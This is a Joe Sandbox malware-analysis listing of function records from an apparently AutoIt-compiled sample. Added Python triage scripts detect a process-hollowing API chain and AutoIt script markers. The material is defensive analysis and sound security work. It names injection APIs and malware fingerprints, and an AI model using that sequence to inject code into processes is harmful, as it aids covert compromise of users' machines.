                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 338bef8d9402d040924b2428fb5d3134793226d70eda938fea1b6002b28d5b5c
                                          • Instruction ID: 3b064a6e8f755e94ae810bccfed09efff4cc9bb5db24bbc568c4d0aec67230f2
                                          • Opcode Fuzzy Hash: 338bef8d9402d040924b2428fb5d3134793226d70eda938fea1b6002b28d5b5c
                                          • Instruction Fuzzy Hash: D3C18E74A04216EFCB14CF94D888EAEB7F5FF88714B119599E985EB250D730ED81CB90
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E683D8
                                          • CoUninitialize.OLE32 ref: 00E683E3
                                            • Part of subcall function 00E4DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4DAC5
                                          • VariantInit.OLEAUT32(?), ref: 00E683EE
                                          • VariantClear.OLEAUT32(?), ref: 00E686BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 1a805c0c92e84619c06989c686c36bb5afcda683e48764478905d346a311913d
                                          • Instruction ID: 6c64d75a5e97983c26cbb53266b79400cf6074e81ad74ad4ca73cdd44f19a3dc
                                          • Opcode Fuzzy Hash: 1a805c0c92e84619c06989c686c36bb5afcda683e48764478905d346a311913d
                                          • Instruction Fuzzy Hash: 3BA16B756447019FCB10DF24D591B2AB7E4FF88354F059548FA9AAB3A1CB70EC44CB62
                                          APIs
                                            • Part of subcall function 00DF5045: _fseek.LIBCMT ref: 00DF505D
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AAE
                                            • Part of subcall function 00E599BE: _wcscmp.LIBCMT ref: 00E59AC1
                                          • _free.LIBCMT ref: 00E5992C
                                          • _free.LIBCMT ref: 00E59933
                                          • _free.LIBCMT ref: 00E5999E
                                            • Part of subcall function 00E12F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E19C64), ref: 00E12FA9
                                            • Part of subcall function 00E12F95: GetLastError.KERNEL32(00000000,?,00E19C64), ref: 00E12FBB
                                          • _free.LIBCMT ref: 00E599A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 5c495b0b21d28be1d374838fa88e788ff3099b5f50b4cf91438e6cc607167dd1
                                          • Instruction ID: bd09bdac5beaec4cc3d9343970fcd6a4382209195a4070354b3e77bf68f73af6
                                          • Opcode Fuzzy Hash: 5c495b0b21d28be1d374838fa88e788ff3099b5f50b4cf91438e6cc607167dd1
                                          • Instruction Fuzzy Hash: C55161B1904258EFDF249F64DC45AEEBBB9EF48300F00449EB609B7242DB315A94CF69
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction ID: 4fae192645ec0fa681e63638cbd1ec943ddd48b85d5c35af0317a5e079e6c8e1
                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                          • Instruction Fuzzy Hash: 4541C5F16006069BDB18CE69C8809EF77A6EF84364B24A17DE855A77C0E7719DC08B44
                                          APIs
                                          • _memset.LIBCMT ref: 00DF4560
                                            • Part of subcall function 00DF410D: _memset.LIBCMT ref: 00DF418D
                                            • Part of subcall function 00DF410D: _wcscpy.LIBCMT ref: 00DF41E1
                                            • Part of subcall function 00DF410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DF41F1
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00DF45B5
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DF45C4
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E2D6CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: a1688d0bbe4c9ea85e8a911ff5a2a807dad283e001a23042e5a7818f0928ca2e
                                          • Instruction ID: f075cfde408fcdafe0c7291f19afa487f3cee7e07ce41bc0e4528f71fcb48258
                                          • Opcode Fuzzy Hash: a1688d0bbe4c9ea85e8a911ff5a2a807dad283e001a23042e5a7818f0928ca2e
                                          • Instruction Fuzzy Hash: 0921A770908798AFEB329B24DC55BF7BBEC9F01308F04509EE79E66285C7745A888B51
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: AU3!P/$EA06
                                          • API String ID: 4104443479-182974850
                                          • Opcode ID: a827ca9066639a7f52467c487570fd6915d21a9df6d0ba3c234ad3c3e6758631
                                          • Instruction ID: dad628907d9213083d702d0b5e4f7b2c8746002cdbcf02ef3e087a607d7bbd7c
                                          • Opcode Fuzzy Hash: a827ca9066639a7f52467c487570fd6915d21a9df6d0ba3c234ad3c3e6758631
                                          • Instruction Fuzzy Hash: B5415D32A0415C5BDF119B649C527BF7FA5EF05300F6EC065FF82AB286D5619E8483B1
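The records in this listing give per-function API calls but no verdict. Two of them deserve a second look: the record at offset 00FF0000 chains CreateProcessW, Wow64GetThreadContext with ContextFlags 00010007 (CONTEXT_FULL for x86) and a four-byte ReadProcessMemory from a region the report marks "based on PE: false", which is the opening sequence of process-hollowing style injection, and the _memmove record above carries the compiled-AutoIt marker strings AU3! and EA06. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses records in this listing's layout and applies three triage rules to them. The sample listing is constructed from records on this page, and the function names, rule names, API groupings and severities are the author's assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the layout of the records above: API lines, source-file
# lines and String IDs are copied from this page; the record order is the author's.
SAMPLE_REPORT = r"""
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00FF1A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FF1AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FF1B13
• Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
• String ID:
APIs
  • Part of subcall function 00FF22A0: Sleep.KERNELBASE(000001F4), ref: 00FF22B1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FF24B9
• Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
• String ID: U4NPLTMSLN
APIs
• Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• String ID: AU3!P/$EA06
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000), ref: 00DF35D4
• RegCloseKey.KERNELBASE(00000000,?,?,00DF35A1,SwapMouseButtons,00000004), ref: 00DF3617
• Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
• String ID: Control Panel\Mouse
"""

# One API line: optional "Part of subcall function X:" prefix, then Name.MODULE
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"([A-Za-z_]\w*)\.(\w+)(?=[(\s]|$)"
)
PE_RE = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)

# API groupings for the injection rule (author's assumption, not the report's taxonomy)
CREATE_PROCESS = {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}
THREAD_CONTEXT = {"GetThreadContext", "Wow64GetThreadContext",
                  "SetThreadContext", "Wow64SetThreadContext"}
REMOTE_MEMORY = {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
                 "VirtualAllocEx", "NtUnmapViewOfSection", "ResumeThread"}
AUTOIT_MARKERS = ("AU3!", ">>>AUTOIT SCRIPT<<<", ">>>AUTOIT NO CMDEXECUTE<<<")


@dataclass
class Record:
    apis: List[str] = field(default_factory=list)     # API names in listed order
    strings: List[str] = field(default_factory=list)  # String ID split on '$'
    pe_backed: Optional[bool] = None                  # "based on PE: true/false"


def parse_records(text: str) -> List[Record]:
    """Split a listing into records; each bare 'APIs' line starts a new one."""
    records: List[Record] = []
    current: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Record()
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("• String ID:"):
            body = line[len("• String ID:"):].strip()
            current.strings = [s for s in body.split("$") if s]
        elif "based on PE:" in line:
            pe = PE_RE.search(line)
            current.pe_backed = pe.group(1).lower() == "true" if pe else None
        else:
            m = API_RE.match(raw)
            if m:
                current.apis.append(m.group(1))
    return records


def triage(records: List[Record]) -> List[Dict[str, object]]:
    """Apply three rules per record and return findings in record order."""
    findings: List[Dict[str, object]] = []
    for idx, rec in enumerate(records):
        names = set(rec.apis)
        if names & CREATE_PROCESS and names & THREAD_CONTEXT and names & REMOTE_MEMORY:
            # the same chain run from memory no PE image backs is the stronger signal
            findings.append({"record": idx, "rule": "process_hollowing_prelude",
                             "severity": "high" if rec.pe_backed is False else "medium",
                             "apis": sorted(names & (CREATE_PROCESS | THREAD_CONTEXT | REMOTE_MEMORY))})
        elif rec.pe_backed is False and rec.apis:
            findings.append({"record": idx, "rule": "api_calls_from_unbacked_memory",
                             "severity": "medium", "apis": list(rec.apis)})
        if any(mark in s for s in rec.strings for mark in AUTOIT_MARKERS):
            findings.append({"record": idx, "rule": "autoit_compiled_script_marker",
                             "severity": "info", "strings": list(rec.strings)})
    return findings


if __name__ == "__main__":
    for finding in triage(parse_records(SAMPLE_REPORT)):
        print(finding)
```

Run it against a plain-text export of the listing; records with no API lines (the report emits those too) simply yield no API-based finding, and the injection chain seen from PE-backed memory is still reported, only at medium severity, because a legitimate debugger or loader can issue the same calls from its own image.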
                                          APIs
                                          • _memset.LIBCMT ref: 00E2EE62
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00E2EEAC
                                            • Part of subcall function 00DF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF48A1,?,?,00DF37C0,?), ref: 00DF48CE
                                            • Part of subcall function 00E109D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E109F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: ec89091aff0e0f67535518f790edec1406fa6050d66744164216ca645dd81a23
                                          • Instruction ID: 00d425671d5d2e3cee8b2a1a8994050abf98818955ef2f9c961c23cfe611bc93
                                          • Opcode Fuzzy Hash: ec89091aff0e0f67535518f790edec1406fa6050d66744164216ca645dd81a23
                                          • Instruction Fuzzy Hash: 4A21A131A0025C9BCB11DF94DC45BFE7BF8AF49304F00805AE509BB242DBB459898FA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 58177dff9ba039adf8db78fe548e047f0241359ad15251cb650c863a87c4dd21
                                          • Instruction ID: b4f65ae035c4c2067615354aa7743bb8fa1a096b809a6c212c64713732a60dc8
                                          • Opcode Fuzzy Hash: 58177dff9ba039adf8db78fe548e047f0241359ad15251cb650c863a87c4dd21
                                          • Instruction Fuzzy Hash: 4501F972C04258AEDB28C6A8C856EEE7BF8DB05301F00459AF552E2181E5B5A608CB60
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00E59B82
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E59B99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 2dde86afedd1f544f12d0f2f3719f5649ed99ed940c936017a04e3b6527de3ba
                                          • Instruction ID: 2587cd1861a8f2792c31c58970cf61e247e2198d136222ced4877afd4d46befb
                                          • Opcode Fuzzy Hash: 2dde86afedd1f544f12d0f2f3719f5649ed99ed940c936017a04e3b6527de3ba
                                          • Instruction Fuzzy Hash: FFD05B7554030DAFDB10DB90DC0DF9A776CD704701F0041B1FE54A50B2EEB055D98B91
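The `AU3!` and `EA06` strings carried by the `_memmove` / `__fread_nolock` functions above, together with the `aut` prefix this function passes to GetTempFileNameW, are the fingerprints behind the report's "compiled AutoIt script" verdict. The following is an added triage check, not part of the Joe Sandbox report: a Python scan for the AutoIt3 resource signature and the `AU3!EA06` header in a sample, plus a matcher for the `%TEMP%\autXXXX.tmp` names that `GetTempFileNameW(path, "aut", 0, buf)` produces (with uUnique = 0 the API appends up to four hex digits and `.TMP`). The 16-byte signature constant is the publicly documented AutoIt3 magic; the byte blob in the usage section is constructed for the demonstration.

```python
"""Triage check for an embedded AutoIt3 compiled script.

Added example, not part of the Joe Sandbox report. It looks for the two markers
behind the report's "compiled AutoIt script" verdict and for the %TEMP% file
names that GetTempFileNameW(path, "aut", 0, buf) produces.
"""
import re
from typing import Dict, Optional

# Publicly documented AutoIt3 compiled-script resource signature ("A3X" magic).
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
# "AU3!" tag followed by the script-format version; EA06 is the 3.3.x format
# the report shows, EA05 the older one.
AU3_HEADER_RE = re.compile(rb"AU3!(EA0[56])")
# GetTempFileName with uUnique == 0 yields <prefix><up to 4 hex digits>.TMP.
AUT_TEMPNAME_RE = re.compile(r"^aut[0-9A-Fa-f]{1,4}\.tmp$", re.IGNORECASE)


def find_autoit_script(data: bytes) -> Optional[Dict[str, object]]:
    """Return marker offsets and format version if present, else None."""
    magic_off = data.find(AU3_MAGIC)
    hdr = AU3_HEADER_RE.search(data)
    if magic_off < 0 and hdr is None:
        return None
    return {
        "magic_offset": magic_off if magic_off >= 0 else None,
        "header_offset": hdr.start() if hdr else None,
        "format_version": hdr.group(1).decode("ascii") if hdr else None,
        # Both markers together is the strong signal; one alone may be a stray string hit.
        "both_markers": magic_off >= 0 and hdr is not None,
    }


def is_autoit_tempname(name: str) -> bool:
    """Match autXXXX.tmp names; a weak indicator on its own (legitimate AutoIt uses it too)."""
    return AUT_TEMPNAME_RE.match(name) is not None


def scan_file(path: str) -> Optional[Dict[str, object]]:
    """Run find_autoit_script over a file on disk."""
    with open(path, "rb") as fh:
        return find_autoit_script(fh.read())


if __name__ == "__main__":
    # Constructed blob: a fake MZ stub followed by the AutoIt markers.
    blob = b"MZ" + b"\x00" * 64 + AU3_MAGIC + b"AU3!EA06" + b"\x00" * 16
    print(find_autoit_script(blob))
    print(is_autoit_tempname("aut1A2B.tmp"), is_autoit_tempname("autrun.tmp"))
```

Run `scan_file()` against the sample to confirm the verdict offline; on a host, the temp-name matcher is only useful together with the parent process (an unsigned executable writing `aut*.tmp` then spawning a child is the pattern to alert on, not the file name alone).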
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 967c74f33dc6d4dd2cdd67b30cc8d957edee3fba520482569596734f00349737
                                          • Instruction ID: d74a01a066213312f3fb6f9898fdf4b4a311ea4eb6062d06a94def9e921ff50c
                                          • Opcode Fuzzy Hash: 967c74f33dc6d4dd2cdd67b30cc8d957edee3fba520482569596734f00349737
                                          • Instruction Fuzzy Hash: 05F16870A083059FC714DF28C890A6ABBE5FF88354F54992EF899AB351D730E945CF92
                                          APIs
                                          • _memset.LIBCMT ref: 00DF4401
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DF44A6
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DF44C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: abf17293283fc209df16e6a03e899287be528e3f858cca67307b36b2b1baabe2
                                          • Instruction ID: 11b942431fea2226b8688114db5dd38473a38fe657eda2b79577146592be08b5
                                          • Opcode Fuzzy Hash: abf17293283fc209df16e6a03e899287be528e3f858cca67307b36b2b1baabe2
                                          • Instruction Fuzzy Hash: 9D3184705047059FD721DF35D8847A7BBE4FB48304F044A2EF69AA3250D7B5A948CBA2
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00E15963
                                            • Part of subcall function 00E1A3AB: __NMSG_WRITE.LIBCMT ref: 00E1A3D2
                                            • Part of subcall function 00E1A3AB: __NMSG_WRITE.LIBCMT ref: 00E1A3DC
                                          • __NMSG_WRITE.LIBCMT ref: 00E1596A
                                            • Part of subcall function 00E1A408: GetModuleFileNameW.KERNEL32(00000000,00EB43BA,00000104,?,00000001,00000000), ref: 00E1A49A
                                            • Part of subcall function 00E1A408: ___crtMessageBoxW.LIBCMT ref: 00E1A548
                                            • Part of subcall function 00E132DF: ___crtCorExitProcess.LIBCMT ref: 00E132E5
                                            • Part of subcall function 00E132DF: ExitProcess.KERNEL32 ref: 00E132EE
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          • RtlAllocateHeap.NTDLL(01780000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: d9396c84ce43117cfe21d20f8de244d38a639f5caacfecb4fbcafd206f99a4e1
                                          • Instruction ID: c51ac2e623567c0ea13f6a48c8e9d400bd227ef2eda3683c6a509c1096230c71
                                          • Opcode Fuzzy Hash: d9396c84ce43117cfe21d20f8de244d38a639f5caacfecb4fbcafd206f99a4e1
                                          • Instruction Fuzzy Hash: 0F01D672201716DEE6113B35EC42AEE72D89FC1734F502136F420BA1D1DA709DC18662
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E597D2,?,?,?,?,?,00000004), ref: 00E59B45
                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E597D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E59B5B
                                          • CloseHandle.KERNEL32(00000000,?,00E597D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E59B62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: d63b30c5d122e9f098b896b11f666cf17e58c2bed86155d5cd2d59e6418fce0c
                                          • Instruction ID: e6d9fb50e6197f7bf8a5b8aa504e3d2cd3866dafff62863887f472ddd4eda32f
                                          • Opcode Fuzzy Hash: d63b30c5d122e9f098b896b11f666cf17e58c2bed86155d5cd2d59e6418fce0c
                                          • Instruction Fuzzy Hash: 12E08632581214FBE7215B65EC09FCA7B58AB05765F104220FB58790E187B125559798
                                          APIs
                                          • _free.LIBCMT ref: 00E58FA5
                                            • Part of subcall function 00E12F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E19C64), ref: 00E12FA9
                                            • Part of subcall function 00E12F95: GetLastError.KERNEL32(00000000,?,00E19C64), ref: 00E12FBB
                                          • _free.LIBCMT ref: 00E58FB6
                                          • _free.LIBCMT ref: 00E58FC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
